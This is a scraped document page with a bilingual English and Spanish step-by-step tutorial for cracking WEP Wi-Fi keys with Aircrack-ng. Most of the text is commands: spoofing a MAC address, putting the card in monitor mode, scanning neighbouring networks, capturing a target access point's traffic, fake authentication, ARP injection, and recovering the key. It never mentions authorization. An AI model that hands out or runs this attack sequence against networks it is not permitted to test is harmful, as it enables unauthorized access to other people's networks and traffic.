You are on page 1of 2

fabriciogomezmilla@hotmail.

com

Aircrack-ng (English) 1) check wlan0 and MAC of your device (ifconfig) Podemos cambiar nuestra MAC por seguridad o comodidad con: macchanger -m 00:11:22:33:44:55 wlan0 2) New terminal--> airmon-ng start wlan0 (initiate monitor mode on wlan0, now w ell use the new device called mon0) 3) airodump-ng mon0 (well check wifi nets with all the information). We identify WEP and then CTRL-C to exit 4) airodump-ng -c 1 --bssid 00:3E:RT:4E:ER -w datacapture mon0 (we start capture DATA on a file. -c is for channel, --bssid MAC of AP, -w name of the file, then name of monitor device) Now we are capturing data on a file in /root or /root/Desktop 5) New terminal--> aireplay-ng -1 6000 -o 1 -q 10 -e HOP3 -a 00:3E:RT:4E:ER -h 3 E:4R:TT:45:ES mon0 (-1 is false authentication, 6000 is reauthentication cada 6000 sec, -o es la va riedad de paquetes..se usa 1, -q is send ACK or keep alive msg, -e AP name, -a A P MAC, -h nuestra MAC..usar la de wlan0 que se la pasa siempre a mon0, finally use mon 0) You need to see "Association successfull :-) .." msg, then youll see ACK replys 6) Now we see that have few DATA...well inyect ARP and wait until AP reply our AR P data...20min or more. Collect 70.000 DATA or more. aireplay-ng -3 -b 00:3E:RT:4E:ER -h 3E:4R:TT:45:ES mon0 (-3 is to inyect ARP data, -b AP MAC, -h nuestra MAC, monitor interface mon0) 7) New terminal--> aircrack-ng -z -b 00:3E:RT:4E:ER datacapture.cap (-b AP MAC, datacapture is the filename with DATA) ******************************************************************************** ******************* Aircrack-ng (Espaol) PARA LOS QUE NO SABEN SI FUNCIONA O NO SU TARJETA EN MODO MONITOR: *Iniciar desde live-cd en vez de Vmware porque vmware solo detecta las que van p or USB.Con la version mas reciente que haya de Backtrack. *Ejecutar Iwconfig y ver si aparece.Si no aparece buscar el nombre del chipset c oncreto de la tarjeta inalambrica en Windows con programas como Everest. *Una vez que sabemos el chipset mirar en las paginas que les puse un poco mas ab ajo sobre chipsets soportados y si hace falta meterle drivers o algo asi. Miren si su chipset de su tarjeta inalambrica sirve para inyectar aqui: http://frikeando.wordpress.com/2006/06/29/auditoria-wireless-%C2%BFque-tarjet... http://hwagm.elhacker.net/htm/tarjetas.htm http://www.aircrack-ng.org/doku.php?id=compatibility_drivers 1) Verificar la placa de red instalada si es reconocida con ifconfig.Podemos cam biar nuestra MAC por seguridad o comodidad con: macchanger -m 00:11:22:33:44:55 wlan0

2) Abrimos nueva ventana. Iniciar el modo monitor en la placa. Veremos una placa nueva llamada mon0 airmon-ng start wlan0 3) Vemos la informacion de las redes vecinas. Identificamos WEP y salimos airodump-ng mon0 4) Capturamos paquetes (DATA) en un archivo. Descripcion de parmetros.(-c canal u sado, --bssid MAC del Acces Point, -w nombre del archivo .cap, nombre de la plac a modo monitor) airodump-ng -c 1 --bssid 00:3E:RT:4E:ER -w datacapture mon0 5) Nueva ventana terminal. (-1 falsa autenticacion, 6000 reatuenticacion cada 60 00 seg, -o es la variedad de paquetes..se usa 1, -q manda ACK o keep alive msg, -e nombre AP , -a AP MAC,-h nuestra MAC..usar la de wlan0 que se la pasa siempre a mon0, luego mon0).Tenemos que ver "Association successfull :-) .." que son la respuesta del ACK aireplay-ng -1 6000 -o 1 -q 10 -e HOP3 -a 00:3E:RT:4E:ER -h 3E:4R:TT:45:ES mon0 6) Vemos algunos DATA pero necesitamos mas. Vamos a inyectar ARP hasta que nos r esponda el AP y lleguemos a los 70.000 DATA...20min mas o menos. (-3 para inyectar ARP, -b AP MAC, -h nuestra MAC, monitor interface mon0) aireplay-ng -3 -b 00:3E:RT:4E:ER -h 3E:4R:TT:45:ES mon0 7) Nueva ventana y finalmente. (-b AP MAC, datacapture es el archivo con la capt ura) aircrack-ng -z -b 00:3E:RT:4E:ER datacapture.cap

You might also like